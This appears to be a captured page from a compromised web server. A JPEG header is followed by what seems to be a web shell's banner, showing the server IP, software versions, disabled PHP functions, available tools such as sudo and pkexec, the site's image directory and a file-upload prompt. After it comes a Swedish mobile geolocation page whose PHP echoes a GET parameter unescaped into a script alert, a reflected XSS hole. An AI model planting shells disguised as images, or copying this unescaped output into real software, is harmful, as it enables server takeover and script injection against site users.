????JFIF??x?x????'
| Server IP : 79.136.114.73 / Your IP : 216.73.216.55 Web Server : Apache/2.4.7 (Ubuntu) PHP/5.5.9-1ubuntu4.29 OpenSSL/1.0.1f System : Linux b8009 3.13.0-170-generic #220-Ubuntu SMP Thu May 9 12:40:49 UTC 2019 x86_64 User : www-data ( 33) PHP Version : 5.5.9-1ubuntu4.29 Disable Function : pcntl_alarm,pcntl_fork,pcntl_waitpid,pcntl_wait,pcntl_wifexited,pcntl_wifstopped,pcntl_wifsignaled,pcntl_wexitstatus,pcntl_wtermsig,pcntl_wstopsig,pcntl_signal,pcntl_signal_dispatch,pcntl_get_last_error,pcntl_strerror,pcntl_sigprocmask,pcntl_sigwaitinfo,pcntl_sigtimedwait,pcntl_exec,pcntl_getpriority,pcntl_setpriority, MySQL : ON | cURL : ON | WGET : ON | Perl : ON | Python : ON | Sudo : ON | Pkexec : ON Directory : /var/www/www.supervision-online.se/onthefly/images/ |
Upload File : |
<?php
session_start();
?><!DOCTYPE html PUBLIC "-//WAPFORUM//DTD XHTML Mobile 1.0//EN" "http://www.wapforum.org/DTD/xhtml-mobile10.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-Type" content="text/html; charset=ISO-8859-1" />
<meta name="viewport" user-scalable=no; initial-scale=1.0; maximum-scale=1.0; width=device-width;" />
<meta name="apple-mobile-web-app-capable" content="yes" />
<meta name="apple-mobile-web-app-status-bar-style" content="black" />
<meta name="viewport" content="user-scalable=0" />
<title>Supervsion - On the fly!</title>
<style type="text/css">
.text {
font-size: 12px;
font-family: Arial, Helvetica, sans-serif;
font-weight: bold;
}
.rubrik {
font-size: 18px;
text-align: center;
font-family: Arial, Helvetica, sans-serif;
font-weight: bold;
}
</style>
<?php
if($_GET['message'] != "" ){
echo("<script>alert('".$_GET['message']."');</script>");
}
?>
</head>
<body topmargin="0" marginheight="0" marginwidth="0" leftmargin="0" bgcolor="#EEEEEE">
<table width="100%" border="0" cellspacing="0" cellpadding="0">
<tr>
<td width="30" background="images/ls.jpg"><img src="images/ltc.jpg" width="30" height="36" /></td>
<td width="*" background="images/ts.jpg" bgcolor="#FFFFFF"> </td>
<td width="*" background="images/ts.jpg" bgcolor="#FFFFFF"> </td>
<td width="30" background="images/rc.jpg"><img src="images/rtc.jpg" width="30" height="36" /></td>
</tr>
<tr>
<td background="images/ls.jpg"> </td>
<td align="center" bgcolor="#FFFFFF"> </td>
<td align="center" bgcolor="#FFFFFF"><p><br />
<img src="images/onthefly.png" alt="" width="298" height="67" /><br />
</p>
<p class="rubrik">Lägg till position:</p>
<p><br />
<div id="pos"></div>
<br />
<span class="text">Powered by Supervision Online</span></p></td>
<td background="images/rc.jpg"> </td>
</tr>
<tr>
<td><img src="images/lbc.jpg" width="30" height="38" /></td>
<td background="images/bs.jpg" bgcolor="#eeeeee"> </td>
<td background="images/bs.jpg" bgcolor="#eeeeee"> </td>
<td><img src="images/rbc.jpg" width="30" height="38" /></td>
</tr>
</table>
</body>
</html>
<script>
var marker;
var infoWindow;
if (navigator.geolocation) {
var timeoutVal = 1 * 1000 * 1000;
navigator.geolocation.watchPosition(
displayPosition,
displayError,
{ enableHighAccuracy: true, timeout: timeoutVal, maximumAge: 0 }
);
}
else {
alert("Geolocation is not supported by this browser");
}
function displayPosition(position) {
var contentString = "<br/><b>User location:</b> lat " + position.coords.latitude + ", long " + position.coords.longitude + ", accuracy " + position.coords.accuracy;
// alert(contentString);
document.getElementById('pos').innerHTML = contentString;
}
function displayError(error) {
var errors = {
1: 'Permission denied',
2: 'Position unavailable',
3: 'Request timeout'
};
alert("Error: " + errors[error.code]);
}
</script>